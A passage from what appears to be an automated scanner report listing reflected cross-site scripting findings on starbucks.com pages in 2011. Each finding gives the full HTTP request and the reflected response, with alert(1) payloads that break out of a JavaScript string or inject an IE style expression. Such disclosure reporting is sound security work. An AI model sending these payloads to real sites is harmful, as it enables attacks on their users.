<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?4774c"style="x:expression(alert(1))"403ec5c4484=1" />
...[SNIP]...

1.657. http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/africa-arabia

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2c4da"%3balert(1)//dbdcde42a66 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2c4da";alert(1)//dbdcde42a66 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/africa-arabia?2c4da"%3balert(1)//dbdcde42a66=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:41 GMT
Connection: close
Content-Length: 41968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101032001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/africa-arabia?2c4da";alert(1)//dbdcde42a66=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.658. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6f4f8"style="x:expression(alert(1))"3b6680e832f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/asia-pacific?6f4f8"style%3d"x%3aexpression(alert(1))"3b6680e832f=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:47 GMT
Connection: close
Content-Length: 41482

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?6f4f8"style="x:expression(alert(1))"3b6680e832f=1" />
...[SNIP]...

1.659. http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/asia-pacific

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60e4f"%3balert(1)//ccc1047f29b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 60e4f";alert(1)//ccc1047f29b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/asia-pacific?60e4f"%3balert(1)//ccc1047f29b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:14:53 GMT
Connection: close
Content-Length: 41387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
r flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064965001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/asia-pacific?60e4f";alert(1)//ccc1047f29b=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.660. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47d4a"%3balert(1)//629b8d5aeec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 47d4a";alert(1)//629b8d5aeec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a"%3balert(1)//629b8d5aeec=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:17 GMT
Connection: close
Content-Length: 43744

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
= {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643064966001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?47d4a";alert(1)//629b8d5aeec=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.661. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e440"style%3d"x%3aexpression(alert(1))"503f9615132 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e440"style="x:expression(alert(1))"503f9615132 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style%3d"x%3aexpression(alert(1))"503f9615132=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:16:11 GMT
Connection: close
Content-Length: 43839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast?5e440"style="x:expression(alert(1))"503f9615132=1" />
...[SNIP]...

1.662. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ca7e4"style="x:expression(alert(1))"acb65ae86d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style%3d"x%3aexpression(alert(1))"acb65ae86d6=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:20 GMT
Connection: close
Content-Length: 40353

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/decaf-pike-place-roast?ca7e4"style="x:expression(alert(1))"acb65ae86d6=1"/>
...[SNIP]...

1.663. http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a6b9"style="x:expression(alert(1))"d5a41dc5583 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style%3d"x%3aexpression(alert(1))"d5a41dc5583=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:22 GMT
Connection: close
Content-Length: 40708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/dark-and-specialty-roast/pike-place-roast?1a6b9"style="x:expression(alert(1))"d5a41dc5583=1"/>
...[SNIP]...

1.664. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eff70"style="x:expression(alert(1))"6f0990795c7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/latin-america?eff70"style%3d"x%3aexpression(alert(1))"6f0990795c7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:01 GMT
Connection: close
Content-Length: 46735

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?eff70"style="x:expression(alert(1))"6f0990795c7=1" />
...[SNIP]...

1.665. http://www.starbucks.com/coffee/whole-bean-coffee/latin-america [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/latin-america

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9edbf"%3balert(1)//c0d90c55a41 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9edbf";alert(1)//c0d90c55a41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/latin-america?9edbf"%3balert(1)//c0d90c55a41=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:14 GMT
Connection: close
Content-Length: 46640

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101031001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/latin-america?9edbf";alert(1)//c0d90c55a41=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.666. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f4325"style="x:expression(alert(1))"db73de7f50b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?f4325"style%3d"x%3aexpression(alert(1))"db73de7f50b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:36 GMT
Connection: close
Content-Length: 42978

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?f4325"style="x:expression(alert(1))"db73de7f50b=1" />
...[SNIP]...

1.667. http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffee/whole-bean-coffee/multi-region-blends

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3a82"%3balert(1)//5ab9813aafa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d3a82";alert(1)//5ab9813aafa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffee/whole-bean-coffee/multi-region-blends?d3a82"%3balert(1)//5ab9813aafa=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:15:39 GMT
Connection: close
Content-Length: 42883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
vars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "643101033001";
   flashvars.playerLocation = "http://www.starbucks.com/coffee/whole-bean-coffee/multi-region-blends?d3a82";alert(1)//5ab9813aafa=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.668. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 124ea"%3balert(1)//bd639cab20c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 124ea";alert(1)//bd639cab20c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /coffeehouse?124ea"%3balert(1)//bd639cab20c=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:59 GMT
Connection: close
Content-Length: 52656

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
"text/javascript">
   var flashvars = {};
   flashvars.playerType = "category";
   flashvars.playlistID = "96759747001";
   flashvars.playerLocation = "http://www.starbucks.com/coffeehouse?124ea";alert(1)//bd639cab20c=1";
   var params = {};
   params.loop = "false";
   params.quality = "best";
   params.scale = "exactfit";
   params.wmode = "transparent";
   params.allowscriptaccess = "always";

...[SNIP]...

1.669. http://www.starbucks.com/coffeehouse [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3df34"style="x:expression(alert(1))"fb0a4a5b623 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse?3df34"style%3d"x%3aexpression(alert(1))"fb0a4a5b623=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:10:56 GMT
Connection: close
Content-Length: 52751

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/coffeehouse?3df34"style="x:expression(alert(1))"fb0a4a5b623=1" />
...[SNIP]...

1.670. http://www.starbucks.com/coffeehouse/community [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /coffeehouse/community

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9fa72"style="x:expression(alert(1))"5a47d7b77de in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /coffeehouse/community?9fa72"style%3d"x%3aexpression(alert(1))"5a47d7b77de=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
